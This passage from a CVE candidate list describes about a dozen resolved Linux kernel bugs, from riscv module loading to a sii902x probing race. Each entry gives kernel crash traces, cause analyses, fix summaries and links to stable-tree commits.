CVE 2024 26619 Candidate In the Linux kernel, the following vulnerability has been resolved: riscv: Fix module loading free order Reverse order of kfree calls to resolve use-after-free error. MISC:https://git.kernel.org/stable/c/2fa79badf4bfeffda6b5032cf62b828486ec9a99 | URL:https://git.kernel.org/stable/c/2fa79badf4bfeffda6b5032cf62b828486ec9a99 | MISC:https://git.kernel.org/stable/c/78996eee79ebdfe8b6f0e54cb6dcc792d5129291 | URL:https://git.kernel.org/stable/c/78996eee79ebdfe8b6f0e54cb6dcc792d5129291 Assigned (20240219)
CVE 2024 26618 Candidate In the Linux kernel, the following vulnerability has been resolved: arm64/sme: Always exit sme_alloc() early with existing storage When sme_alloc() is called with existing storage and we are not flushing we will always allocate new storage, both leaking the existing storage and corrupting the state. Fix this by separating the checks for flushing and for existing storage as we do for SVE. Callers that reallocate (eg, due to changing the vector length) should call sme_free() themselves. MISC:https://git.kernel.org/stable/c/569156e4fa347237f8fa2a7e935d860109c55ac4 | URL:https://git.kernel.org/stable/c/569156e4fa347237f8fa2a7e935d860109c55ac4 | MISC:https://git.kernel.org/stable/c/814af6b4e6000e574e74d92197190edf07cc3680 | URL:https://git.kernel.org/stable/c/814af6b4e6000e574e74d92197190edf07cc3680 | MISC:https://git.kernel.org/stable/c/dc7eb8755797ed41a0d1b5c0c39df3c8f401b3d9 | URL:https://git.kernel.org/stable/c/dc7eb8755797ed41a0d1b5c0c39df3c8f401b3d9 Assigned (20240219)
CVE 2024 26617 Candidate In the Linux kernel, the following vulnerability has been resolved: fs/proc/task_mmu: move mmu notification mechanism inside mm lock Move mmu notification mechanism inside mm lock to prevent race condition in other components which depend on it. The notifier will invalidate memory range. Depending upon the number of iterations, different memory ranges would be invalidated. The following warning would be removed by this patch: WARNING: CPU: 0 PID: 5067 at arch/x86/kvm/../../../virt/kvm/kvm_main.c:734 kvm_mmu_notifier_change_pte+0x860/0x960 arch/x86/kvm/../../../virt/kvm/kvm_main.c:734 There is no behavioural and performance change with this patch when there is no component registered with the mmu notifier. [akpm@linux-foundation.org: narrow the scope of `range', per Sean] MISC:https://git.kernel.org/stable/c/05509adf297924f51e1493aa86f9fcde1433ed80 | URL:https://git.kernel.org/stable/c/05509adf297924f51e1493aa86f9fcde1433ed80 | MISC:https://git.kernel.org/stable/c/4cccb6221cae6d020270606b9e52b1678fc8b71a | URL:https://git.kernel.org/stable/c/4cccb6221cae6d020270606b9e52b1678fc8b71a Assigned (20240219)
CVE 2024 26616 Candidate In the Linux kernel, the following vulnerability has been resolved: btrfs: scrub: avoid use-after-free when chunk length is not 64K aligned [BUG] There is a bug report that, on a ext4-converted btrfs, scrub leads to various problems, including: - "unable to find chunk map" errors BTRFS info (device vdb): scrub: started on devid 1 BTRFS critical (device vdb): unable to find chunk map for logical 2214744064 length 4096 BTRFS critical (device vdb): unable to find chunk map for logical 2214744064 length 45056 This would lead to unrepariable errors. - Use-after-free KASAN reports: ================================================================== BUG: KASAN: slab-use-after-free in __blk_rq_map_sg+0x18f/0x7c0 Read of size 8 at addr ffff8881013c9040 by task btrfs/909 CPU: 0 PID: 909 Comm: btrfs Not tainted 6.7.0-x64v3-dbg #11 c50636e9419a8354555555245df535e380563b2b Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 2023.11-2 12/24/2023 Call Trace: <TASK> dump_stack_lvl+0x43/0x60 print_report+0xcf/0x640 kasan_report+0xa6/0xd0 __blk_rq_map_sg+0x18f/0x7c0 virtblk_prep_rq.isra.0+0x215/0x6a0 [virtio_blk 19a65eeee9ae6fcf02edfad39bb9ddee07dcdaff] virtio_queue_rqs+0xc4/0x310 [virtio_blk 19a65eeee9ae6fcf02edfad39bb9ddee07dcdaff] blk_mq_flush_plug_list.part.0+0x780/0x860 __blk_flush_plug+0x1ba/0x220 blk_finish_plug+0x3b/0x60 submit_initial_group_read+0x10a/0x290 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] flush_scrub_stripes+0x38e/0x430 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] scrub_stripe+0x82a/0xae0 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] scrub_chunk+0x178/0x200 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] scrub_enumerate_chunks+0x4bc/0xa30 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] btrfs_scrub_dev+0x398/0x810 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] btrfs_ioctl+0x4b9/0x3020 [btrfs e57987a360bed82fe8756dcd3e0de5406ccfe965] __x64_sys_ioctl+0xbd/0x100 do_syscall_64+0x5d/0xe0 entry_SYSCALL_64_after_hwframe+0x63/0x6b RIP: 0033:0x7f47e5e0952b - Crash, mostly due to above use-after-free [CAUSE] The converted fs has the following data chunk layout: item 2 key (FIRST_CHUNK_TREE CHUNK_ITEM 2214658048) itemoff 16025 itemsize 80 length 86016 owner 2 stripe_len 65536 type DATA|single For above logical bytenr 2214744064, it's at the chunk end (2214658048 + 86016 = 2214744064). This means btrfs_submit_bio() would split the bio, and trigger endio function for both of the two halves. However scrub_submit_initial_read() would only expect the endio function to be called once, not any more. This means the first endio function would already free the bbio::bio, leaving the bvec freed, thus the 2nd endio call would lead to use-after-free. [FIX] - Make sure scrub_read_endio() only updates bits in its range Since we may read less than 64K at the end of the chunk, we should not touch the bits beyond chunk boundary. - Make sure scrub_submit_initial_read() only to read the chunk range This is done by calculating the real number of sectors we need to read, and add sector-by-sector to the bio. Thankfully the scrub read repair path won't need extra fixes: - scrub_stripe_submit_repair_read() With above fixes, we won't update error bit for range beyond chunk, thus scrub_stripe_submit_repair_read() should never submit any read beyond the chunk. MISC:https://git.kernel.org/stable/c/34de0f04684ec00c093a0455648be055f0e8e24f | URL:https://git.kernel.org/stable/c/34de0f04684ec00c093a0455648be055f0e8e24f | MISC:https://git.kernel.org/stable/c/642b9c520ef2f104277ad1f902f8526edbe087fb | URL:https://git.kernel.org/stable/c/642b9c520ef2f104277ad1f902f8526edbe087fb | MISC:https://git.kernel.org/stable/c/f546c4282673497a06ecb6190b50ae7f6c85b02f | URL:https://git.kernel.org/stable/c/f546c4282673497a06ecb6190b50ae7f6c85b02f Assigned (20240219)
CVE 2024 26615 Candidate In the Linux kernel, the following vulnerability has been resolved: net/smc: fix illegal rmb_desc access in SMC-D connection dump A crash was found when dumping SMC-D connections. It can be reproduced by following steps: - run nginx/wrk test: smc_run nginx smc_run wrk -t 16 -c 1000 -d <duration> -H 'Connection: Close' <URL> - continuously dump SMC-D connections in parallel: watch -n 1 'smcss -D' BUG: kernel NULL pointer dereference, address: 0000000000000030 CPU: 2 PID: 7204 Comm: smcss Kdump: loaded Tainted: G E 6.7.0+ #55 RIP: 0010:__smc_diag_dump.constprop.0+0x5e5/0x620 [smc_diag] Call Trace: <TASK> ? __die+0x24/0x70 ? page_fault_oops+0x66/0x150 ? exc_page_fault+0x69/0x140 ? asm_exc_page_fault+0x26/0x30 ? __smc_diag_dump.constprop.0+0x5e5/0x620 [smc_diag] ? __kmalloc_node_track_caller+0x35d/0x430 ? __alloc_skb+0x77/0x170 smc_diag_dump_proto+0xd0/0xf0 [smc_diag] smc_diag_dump+0x26/0x60 [smc_diag] netlink_dump+0x19f/0x320 __netlink_dump_start+0x1dc/0x300 smc_diag_handler_dump+0x6a/0x80 [smc_diag] ? __pfx_smc_diag_dump+0x10/0x10 [smc_diag] sock_diag_rcv_msg+0x121/0x140 ? __pfx_sock_diag_rcv_msg+0x10/0x10 netlink_rcv_skb+0x5a/0x110 sock_diag_rcv+0x28/0x40 netlink_unicast+0x22a/0x330 netlink_sendmsg+0x1f8/0x420 __sock_sendmsg+0xb0/0xc0 ____sys_sendmsg+0x24e/0x300 ? copy_msghdr_from_user+0x62/0x80 ___sys_sendmsg+0x7c/0xd0 ? __do_fault+0x34/0x160 ? do_read_fault+0x5f/0x100 ? do_fault+0xb0/0x110 ? __handle_mm_fault+0x2b0/0x6c0 __sys_sendmsg+0x4d/0x80 do_syscall_64+0x69/0x180 entry_SYSCALL_64_after_hwframe+0x6e/0x76 It is possible that the connection is in process of being established when we dump it. Assumed that the connection has been registered in a link group by smc_conn_create() but the rmb_desc has not yet been initialized by smc_buf_create(), thus causing the illegal access to conn->rmb_desc. So fix it by checking before dump. MISC:https://git.kernel.org/stable/c/1fea9969b81c67d0cb1611d1b8b7d19049d937be | URL:https://git.kernel.org/stable/c/1fea9969b81c67d0cb1611d1b8b7d19049d937be | MISC:https://git.kernel.org/stable/c/27aea64838914c6122db5b8bd4bed865c9736f22 | URL:https://git.kernel.org/stable/c/27aea64838914c6122db5b8bd4bed865c9736f22 | MISC:https://git.kernel.org/stable/c/5fed92ca32eafbfae8b6bee8ca34cca71c6a8b6d | URL:https://git.kernel.org/stable/c/5fed92ca32eafbfae8b6bee8ca34cca71c6a8b6d | MISC:https://git.kernel.org/stable/c/68b888d51ac82f2b96bf5e077a31d76afcdef25a | URL:https://git.kernel.org/stable/c/68b888d51ac82f2b96bf5e077a31d76afcdef25a | MISC:https://git.kernel.org/stable/c/6994dba06321e3c48fdad0ba796a063d9d82183a | URL:https://git.kernel.org/stable/c/6994dba06321e3c48fdad0ba796a063d9d82183a | MISC:https://git.kernel.org/stable/c/8f3f9186e5bb96a9c9654c41653210e3ea7e48a6 | URL:https://git.kernel.org/stable/c/8f3f9186e5bb96a9c9654c41653210e3ea7e48a6 | MISC:https://git.kernel.org/stable/c/a164c2922675d7051805cdaf2b07daffe44f20d9 | URL:https://git.kernel.org/stable/c/a164c2922675d7051805cdaf2b07daffe44f20d9 | MISC:https://git.kernel.org/stable/c/dbc153fd3c142909e564bb256da087e13fbf239c | URL:https://git.kernel.org/stable/c/dbc153fd3c142909e564bb256da087e13fbf239c Assigned (20240219)
CVE 2024 26614 Candidate In the Linux kernel, the following vulnerability has been resolved: tcp: make sure init the accept_queue's spinlocks once When I run syz's reproduction C program locally, it causes the following issue: pvqspinlock: lock 0xffff9d181cd5c660 has corrupted value 0x0! WARNING: CPU: 19 PID: 21160 at __pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508) Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011 RIP: 0010:__pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508) Code: 73 56 3a ff 90 c3 cc cc cc cc 8b 05 bb 1f 48 01 85 c0 74 05 c3 cc cc cc cc 8b 17 48 89 fe 48 c7 c7 30 20 ce 8f e8 ad 56 42 ff <0f> 0b c3 cc cc cc cc 0f 0b 0f 1f 40 00 90 90 90 90 90 90 90 90 90 RSP: 0018:ffffa8d200604cb8 EFLAGS: 00010282 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff9d1ef60e0908 RDX: 00000000ffffffd8 RSI: 0000000000000027 RDI: ffff9d1ef60e0900 RBP: ffff9d181cd5c280 R08: 0000000000000000 R09: 00000000ffff7fff R10: ffffa8d200604b68 R11: ffffffff907dcdc8 R12: 0000000000000000 R13: ffff9d181cd5c660 R14: ffff9d1813a3f330 R15: 0000000000001000 FS: 00007fa110184640(0000) GS:ffff9d1ef60c0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000000 CR3: 000000011f65e000 CR4: 00000000000006f0 Call Trace: <IRQ> _raw_spin_unlock (kernel/locking/spinlock.c:186) inet_csk_reqsk_queue_add (net/ipv4/inet_connection_sock.c:1321) inet_csk_complete_hashdance (net/ipv4/inet_connection_sock.c:1358) tcp_check_req (net/ipv4/tcp_minisocks.c:868) tcp_v4_rcv (net/ipv4/tcp_ipv4.c:2260) ip_protocol_deliver_rcu (net/ipv4/ip_input.c:205) ip_local_deliver_finish (net/ipv4/ip_input.c:234) __netif_receive_skb_one_core (net/core/dev.c:5529) process_backlog (./include/linux/rcupdate.h:779) __napi_poll (net/core/dev.c:6533) net_rx_action (net/core/dev.c:6604) __do_softirq (./arch/x86/include/asm/jump_label.h:27) do_softirq (kernel/softirq.c:454 kernel/softirq.c:441) </IRQ> <TASK> __local_bh_enable_ip (kernel/softirq.c:381) __dev_queue_xmit (net/core/dev.c:4374) ip_finish_output2 (./include/net/neighbour.h:540 net/ipv4/ip_output.c:235) __ip_queue_xmit (net/ipv4/ip_output.c:535) __tcp_transmit_skb (net/ipv4/tcp_output.c:1462) tcp_rcv_synsent_state_process (net/ipv4/tcp_input.c:6469) tcp_rcv_state_process (net/ipv4/tcp_input.c:6657) tcp_v4_do_rcv (net/ipv4/tcp_ipv4.c:1929) __release_sock (./include/net/sock.h:1121 net/core/sock.c:2968) release_sock (net/core/sock.c:3536) inet_wait_for_connect (net/ipv4/af_inet.c:609) __inet_stream_connect (net/ipv4/af_inet.c:702) inet_stream_connect (net/ipv4/af_inet.c:748) __sys_connect (./include/linux/file.h:45 net/socket.c:2064) __x64_sys_connect (net/socket.c:2073 net/socket.c:2070 net/socket.c:2070) do_syscall_64 (arch/x86/entry/common.c:51 arch/x86/entry/common.c:82) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:129) RIP: 0033:0x7fa10ff05a3d Code: 5b 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d ab a3 0e 00 f7 d8 64 89 01 48 RSP: 002b:00007fa110183de8 EFLAGS: 00000202 ORIG_RAX: 000000000000002a RAX: ffffffffffffffda RBX: 0000000020000054 RCX: 00007fa10ff05a3d RDX: 000000000000001c RSI: 0000000020000040 RDI: 0000000000000003 RBP: 00007fa110183e20 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000202 R12: 00007fa110184640 R13: 0000000000000000 R14: 00007fa10fe8b060 R15: 00007fff73e23b20 </TASK> The issue triggering process is analyzed as follows: Thread A Thread B tcp_v4_rcv //receive ack TCP packet inet_shutdown tcp_check_req tcp_disconnect //disconnect sock ... tcp_set_state(sk, TCP_CLOSE) inet_csk_complete_hashdance ... inet_csk_reqsk_queue_add ---truncated--- MISC:https://git.kernel.org/stable/c/168e7e599860654876c2a1102a82610285c02f02 | URL:https://git.kernel.org/stable/c/168e7e599860654876c2a1102a82610285c02f02 | MISC:https://git.kernel.org/stable/c/198bc90e0e734e5f98c3d2833e8390cac3df61b2 | URL:https://git.kernel.org/stable/c/198bc90e0e734e5f98c3d2833e8390cac3df61b2 | MISC:https://git.kernel.org/stable/c/3982fe726a63fb3de6005e534e2ac8ca7e0aca2a | URL:https://git.kernel.org/stable/c/3982fe726a63fb3de6005e534e2ac8ca7e0aca2a | MISC:https://git.kernel.org/stable/c/b1e0a68a0cd2a83259c444f638b417a8fffc6855 | URL:https://git.kernel.org/stable/c/b1e0a68a0cd2a83259c444f638b417a8fffc6855 | MISC:https://git.kernel.org/stable/c/bc99dcedd2f422d602516762b96c8ef1ae6b2882 | URL:https://git.kernel.org/stable/c/bc99dcedd2f422d602516762b96c8ef1ae6b2882 | MISC:https://git.kernel.org/stable/c/d86cc6ab33b085eaef27ea88b78fc8e2375c0ef3 | URL:https://git.kernel.org/stable/c/d86cc6ab33b085eaef27ea88b78fc8e2375c0ef3 Assigned (20240219)
CVE 2024 26612 Candidate In the Linux kernel, the following vulnerability has been resolved: netfs, fscache: Prevent Oops in fscache_put_cache() This function dereferences "cache" and then checks if it's IS_ERR_OR_NULL(). Check first, then dereference. MISC:https://git.kernel.org/stable/c/1c45256e599061021e2c848952e50f406457e448 | URL:https://git.kernel.org/stable/c/1c45256e599061021e2c848952e50f406457e448 | MISC:https://git.kernel.org/stable/c/3be0b3ed1d76c6703b9ee482b55f7e01c369cc68 | URL:https://git.kernel.org/stable/c/3be0b3ed1d76c6703b9ee482b55f7e01c369cc68 | MISC:https://git.kernel.org/stable/c/4200ad3e46ce50f410fdda302745489441bc70f0 | URL:https://git.kernel.org/stable/c/4200ad3e46ce50f410fdda302745489441bc70f0 | MISC:https://git.kernel.org/stable/c/82a9bc343ba019665d3ddc1d9a180bf0e0390cf3 | URL:https://git.kernel.org/stable/c/82a9bc343ba019665d3ddc1d9a180bf0e0390cf3 Assigned (20240219)
CVE 2024 26611 Candidate In the Linux kernel, the following vulnerability has been resolved: xsk: fix usage of multi-buffer BPF helpers for ZC XDP Currently when packet is shrunk via bpf_xdp_adjust_tail() and memory type is set to MEM_TYPE_XSK_BUFF_POOL, null ptr dereference happens: [1136314.192256] BUG: kernel NULL pointer dereference, address: 0000000000000034 [1136314.203943] #PF: supervisor read access in kernel mode [1136314.213768] #PF: error_code(0x0000) - not-present page [1136314.223550] PGD 0 P4D 0 [1136314.230684] Oops: 0000 [#1] PREEMPT SMP NOPTI [1136314.239621] CPU: 8 PID: 54203 Comm: xdpsock Not tainted 6.6.0+ #257 [1136314.250469] Hardware name: Intel Corporation S2600WFT/S2600WFT, BIOS SE5C620.86B.02.01.0008.031920191559 03/19/2019 [1136314.265615] RIP: 0010:__xdp_return+0x6c/0x210 [1136314.274653] Code: ad 00 48 8b 47 08 49 89 f8 a8 01 0f 85 9b 01 00 00 0f 1f 44 00 00 f0 41 ff 48 34 75 32 4c 89 c7 e9 79 cd 80 ff 83 fe 03 75 17 <f6> 41 34 01 0f 85 02 01 00 00 48 89 cf e9 22 cc 1e 00 e9 3d d2 86 [1136314.302907] RSP: 0018:ffffc900089f8db0 EFLAGS: 00010246 [1136314.312967] RAX: ffffc9003168aed0 RBX: ffff8881c3300000 RCX: 0000000000000000 [1136314.324953] RDX: 0000000000000000 RSI: 0000000000000003 RDI: ffffc9003168c000 [1136314.336929] RBP: 0000000000000ae0 R08: 0000000000000002 R09: 0000000000010000 [1136314.348844] R10: ffffc9000e495000 R11: 0000000000000040 R12: 0000000000000001 [1136314.360706] R13: 0000000000000524 R14: ffffc9003168aec0 R15: 0000000000000001 [1136314.373298] FS: 00007f8df8bbcb80(0000) GS:ffff8897e0e00000(0000) knlGS:0000000000000000 [1136314.386105] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [1136314.396532] CR2: 0000000000000034 CR3: 00000001aa912002 CR4: 00000000007706f0 [1136314.408377] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [1136314.420173] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [1136314.431890] PKRU: 55555554 [1136314.439143] Call Trace: [1136314.446058] <IRQ> [1136314.452465] ? __die+0x20/0x70 [1136314.459881] ? page_fault_oops+0x15b/0x440 [1136314.468305] ? exc_page_fault+0x6a/0x150 [1136314.476491] ? asm_exc_page_fault+0x22/0x30 [1136314.484927] ? __xdp_return+0x6c/0x210 [1136314.492863] bpf_xdp_adjust_tail+0x155/0x1d0 [1136314.501269] bpf_prog_ccc47ae29d3b6570_xdp_sock_prog+0x15/0x60 [1136314.511263] ice_clean_rx_irq_zc+0x206/0xc60 [ice] [1136314.520222] ? ice_xmit_zc+0x6e/0x150 [ice] [1136314.528506] ice_napi_poll+0x467/0x670 [ice] [1136314.536858] ? ttwu_do_activate.constprop.0+0x8f/0x1a0 [1136314.546010] __napi_poll+0x29/0x1b0 [1136314.553462] net_rx_action+0x133/0x270 [1136314.561619] __do_softirq+0xbe/0x28e [1136314.569303] do_softirq+0x3f/0x60 This comes from __xdp_return() call with xdp_buff argument passed as NULL which is supposed to be consumed by xsk_buff_free() call. To address this properly, in ZC case, a node that represents the frag being removed has to be pulled out of xskb_list. Introduce appropriate xsk helpers to do such node operation and use them accordingly within bpf_xdp_adjust_tail(). MISC:https://git.kernel.org/stable/c/5cd781f7216f980207af09c5e0e1bb1eda284540 | URL:https://git.kernel.org/stable/c/5cd781f7216f980207af09c5e0e1bb1eda284540 | MISC:https://git.kernel.org/stable/c/82ee4781b8200e44669a354140d5c6bd966b8768 | URL:https://git.kernel.org/stable/c/82ee4781b8200e44669a354140d5c6bd966b8768 | MISC:https://git.kernel.org/stable/c/c5114710c8ce86b8317e9b448f4fd15c711c2a82 | URL:https://git.kernel.org/stable/c/c5114710c8ce86b8317e9b448f4fd15c711c2a82 Assigned (20240219)
CVE 2024 26610 Candidate In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix a memory corruption iwl_fw_ini_trigger_tlv::data is a pointer to a __le32, which means that if we copy to iwl_fw_ini_trigger_tlv::data + offset while offset is in bytes, we'll write past the buffer. MISC:https://git.kernel.org/stable/c/05dd9facfb9a1e056752c0901c6e86416037d15a | URL:https://git.kernel.org/stable/c/05dd9facfb9a1e056752c0901c6e86416037d15a | MISC:https://git.kernel.org/stable/c/870171899d75d43e3d14360f3a4850e90a9c289b | URL:https://git.kernel.org/stable/c/870171899d75d43e3d14360f3a4850e90a9c289b | MISC:https://git.kernel.org/stable/c/99a23462fe1a6f709f0fda3ebbe8b6b193ac75bd | URL:https://git.kernel.org/stable/c/99a23462fe1a6f709f0fda3ebbe8b6b193ac75bd | MISC:https://git.kernel.org/stable/c/aa2cc9363926991ba74411e3aa0a0ea82c1ffe32 | URL:https://git.kernel.org/stable/c/aa2cc9363926991ba74411e3aa0a0ea82c1ffe32 | MISC:https://git.kernel.org/stable/c/cf4a0d840ecc72fcf16198d5e9c505ab7d5a5e4d | URL:https://git.kernel.org/stable/c/cf4a0d840ecc72fcf16198d5e9c505ab7d5a5e4d | MISC:https://git.kernel.org/stable/c/f32a81999d0b8e5ce60afb5f6a3dd7241c17dd67 | URL:https://git.kernel.org/stable/c/f32a81999d0b8e5ce60afb5f6a3dd7241c17dd67 Assigned (20240219)
CVE 2024 26608 Candidate In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix global oob in ksmbd_nl_policy Similar to a reported issue (check the commit b33fb5b801c6 ("net: qualcomm: rmnet: fix global oob in rmnet_policy"), my local fuzzer finds another global out-of-bounds read for policy ksmbd_nl_policy. See bug trace below: ================================================================== BUG: KASAN: global-out-of-bounds in validate_nla lib/nlattr.c:386 [inline] BUG: KASAN: global-out-of-bounds in __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600 Read of size 1 at addr ffffffff8f24b100 by task syz-executor.1/62810 CPU: 0 PID: 62810 Comm: syz-executor.1 Tainted: G N 6.1.0 #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x8b/0xb3 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:284 [inline] print_report+0x172/0x475 mm/kasan/report.c:395 kasan_report+0xbb/0x1c0 mm/kasan/report.c:495 validate_nla lib/nlattr.c:386 [inline] __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600 __nla_parse+0x3e/0x50 lib/nlattr.c:697 __nlmsg_parse include/net/netlink.h:748 [inline] genl_family_rcv_msg_attrs_parse.constprop.0+0x1b0/0x290 net/netlink/genetlink.c:565 genl_family_rcv_msg_doit+0xda/0x330 net/netlink/genetlink.c:734 genl_family_rcv_msg net/netlink/genetlink.c:833 [inline] genl_rcv_msg+0x441/0x780 net/netlink/genetlink.c:850 netlink_rcv_skb+0x14f/0x410 net/netlink/af_netlink.c:2540 genl_rcv+0x24/0x40 net/netlink/genetlink.c:861 netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline] netlink_unicast+0x54e/0x800 net/netlink/af_netlink.c:1345 netlink_sendmsg+0x930/0xe50 net/netlink/af_netlink.c:1921 sock_sendmsg_nosec net/socket.c:714 [inline] sock_sendmsg+0x154/0x190 net/socket.c:734 ____sys_sendmsg+0x6df/0x840 net/socket.c:2482 ___sys_sendmsg+0x110/0x1b0 net/socket.c:2536 __sys_sendmsg+0xf3/0x1c0 net/socket.c:2565 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7fdd66a8f359 Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 f1 19 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007fdd65e00168 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007fdd66bbcf80 RCX: 00007fdd66a8f359 RDX: 0000000000000000 RSI: 0000000020000500 RDI: 0000000000000003 RBP: 00007fdd66ada493 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007ffc84b81aff R14: 00007fdd65e00300 R15: 0000000000022000 </TASK> The buggy address belongs to the variable: ksmbd_nl_policy+0x100/0xa80 The buggy address belongs to the physical page: page:0000000034f47940 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x1ccc4b flags: 0x200000000001000(reserved|node=0|zone=2) raw: 0200000000001000 ffffea00073312c8 ffffea00073312c8 0000000000000000 raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffffffff8f24b000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffffffff8f24b080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >ffffffff8f24b100: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 07 f9 ^ ffffffff8f24b180: f9 f9 f9 f9 00 05 f9 f9 f9 f9 f9 f9 00 00 00 05 ffffffff8f24b200: f9 f9 f9 f9 00 00 03 f9 f9 f9 f9 f9 00 00 04 f9 ================================================================== To fix it, add a placeholder named __KSMBD_EVENT_MAX and let KSMBD_EVENT_MAX to be its original value - 1 according to what other netlink families do. Also change two sites that refer the KSMBD_EVENT_MAX to correct value. MISC:https://git.kernel.org/stable/c/2c939c74ef0b74e99b92e32edc2a59f9b9ca3d5a | URL:https://git.kernel.org/stable/c/2c939c74ef0b74e99b92e32edc2a59f9b9ca3d5a | MISC:https://git.kernel.org/stable/c/6993328a4cd62a24df254b587c0796a4a1eecc95 | URL:https://git.kernel.org/stable/c/6993328a4cd62a24df254b587c0796a4a1eecc95 | MISC:https://git.kernel.org/stable/c/9863a53100f47652755545c2bd43e14a1855104d | URL:https://git.kernel.org/stable/c/9863a53100f47652755545c2bd43e14a1855104d | MISC:https://git.kernel.org/stable/c/aaa1f1a2ee80888c12ae2783f3a0be10e14067c5 | URL:https://git.kernel.org/stable/c/aaa1f1a2ee80888c12ae2783f3a0be10e14067c5 | MISC:https://git.kernel.org/stable/c/ebeae8adf89d9a82359f6659b1663d09beec2faa | URL:https://git.kernel.org/stable/c/ebeae8adf89d9a82359f6659b1663d09beec2faa Assigned (20240219)
CVE 2024 26607 Candidate In the Linux kernel, the following vulnerability has been resolved: drm/bridge: sii902x: Fix probing race issue A null pointer dereference crash has been observed rarely on TI platforms using sii9022 bridge: [ 53.271356] sii902x_get_edid+0x34/0x70 [sii902x] [ 53.276066] sii902x_bridge_get_edid+0x14/0x20 [sii902x] [ 53.281381] drm_bridge_get_edid+0x20/0x34 [drm] [ 53.286305] drm_bridge_connector_get_modes+0x8c/0xcc [drm_kms_helper] [ 53.292955] drm_helper_probe_single_connector_modes+0x190/0x538 [drm_kms_helper] [ 53.300510] drm_client_modeset_probe+0x1f0/0xbd4 [drm] [ 53.305958] __drm_fb_helper_initial_config_and_unlock+0x50/0x510 [drm_kms_helper] [ 53.313611] drm_fb_helper_initial_config+0x48/0x58 [drm_kms_helper] [ 53.320039] drm_fbdev_dma_client_hotplug+0x84/0xd4 [drm_dma_helper] [ 53.326401] drm_client_register+0x5c/0xa0 [drm] [ 53.331216] drm_fbdev_dma_setup+0xc8/0x13c [drm_dma_helper] [ 53.336881] tidss_probe+0x128/0x264 [tidss] [ 53.341174] platform_probe+0x68/0xc4 [ 53.344841] really_probe+0x188/0x3c4 [ 53.348501] __driver_probe_device+0x7c/0x16c [ 53.352854] driver_probe_device+0x3c/0x10c [ 53.357033] __device_attach_driver+0xbc/0x158 [ 53.361472] bus_for_each_drv+0x88/0xe8 [ 53.365303] __device_attach+0xa0/0x1b4 [ 53.369135] device_initial_probe+0x14/0x20 [ 53.373314] bus_probe_device+0xb0/0xb4 [ 53.377145] deferred_probe_work_func+0xcc/0x124 [ 53.381757] process_one_work+0x1f0/0x518 [ 53.385770] worker_thread+0x1e8/0x3dc [ 53.389519] kthread+0x11c/0x120 [ 53.392750] ret_from_fork+0x10/0x20 The issue here is as follows: - tidss probes, but is deferred as sii902x is still missing. - sii902x starts probing and enters sii902x_init(). - sii902x calls drm_bridge_add(). Now the sii902x bridge is ready from DRM's perspective. - sii902x calls sii902x_audio_codec_init() and platform_device_register_data() - The registration of the audio platform device causes probing of the deferred devices. - tidss probes, which eventually causes sii902x_bridge_get_edid() to be called. - sii902x_bridge_get_edid() tries to use the i2c to read the edid. However, the sii902x driver has not set up the i2c part yet, leading to the crash. Fix this by moving the drm_bridge_add() to the end of the sii902x_init(), which is also at the very end of sii902x_probe(). MISC:https://git.kernel.org/stable/c/08ac6f132dd77e40f786d8af51140c96c6d739c9 | URL:https://git.kernel.org/stable/c/08ac6f132dd77e40f786d8af51140c96c6d739c9 | MISC:https://git.kernel.org/stable/c/2a4c6af7934a7b4c304542c38fee35e09cc1770c | URL:https://git.kernel.org/stable/c/2a4c6af7934a7b4c304542c38fee35e09cc1770c | MISC:https://git.kernel.org/stable/c/56f96cf6eb11a1c2d594367c3becbfb06a855ec1 | 